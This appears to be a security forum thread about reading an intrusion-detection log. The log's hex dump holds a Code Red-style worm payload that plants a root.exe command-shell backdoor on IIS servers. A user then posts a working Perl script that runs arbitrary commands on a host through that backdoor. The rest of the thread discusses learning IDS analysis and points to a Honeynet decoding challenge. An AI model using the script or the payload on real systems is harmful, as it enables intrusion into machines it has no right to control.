> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5

CODE RED



**Snickers**

[code:1:505efea7a8]
#!/usr/bin/perl
use Socket;
$port="80";
#lets see if this is really vulnerable to this crap...
if ($#ARGV<1) {die "Usage:CodeGreen IP commandn";}
$host=@ARGV[0];
$target = inet_aton($host);

$command=@ARGV[1];
print "Executing [$command] on $host";
$command=~s/ /%20/g;
my @results=sendraw("GET /scripts/root.exe?/c+$command HTTP/1.0rnrn");
print @results;

sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) ||
die("Socket problems");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect..."); }
}

[/code:1:505efea7a8]

hehe, yup, easy one that everyone sees every day im sure =)

actually since i'm on port 81 i dont see it at all.. i just did a google search for d:\inetpub\scripts\root.exe

google rules ;)

Alright. Let me ask some questions.

First, is that a snort log?

Second, when you are breaking down these logs, what do you look for?

I am very curious and want to learn how to break down IDS logs so I can see what is happening.

Anyone care to bring me up to speed? :)

Tarballed

I cant, but would like to second that motion of education. I want some too ;D I just have a godzillion of these gut feelings (some right, some wrong, some are to have a beer) that I just go with.

Ok, when I get home from work tonite Ill take an example packet and try to go through the process on figuring out whats going on.

Ok, sorry its taken me a couple days to post again.... was trying to find an easy sample to explain, but then decided to do something a little different ;)

http://project.honeynet.org/scans/scan23/

The honeynet project has challenges to decode captures and figure out what happened in the traces. This is the Beginners Challenge. You all should check it out and try to solve it before looking at the solutions posted :roll: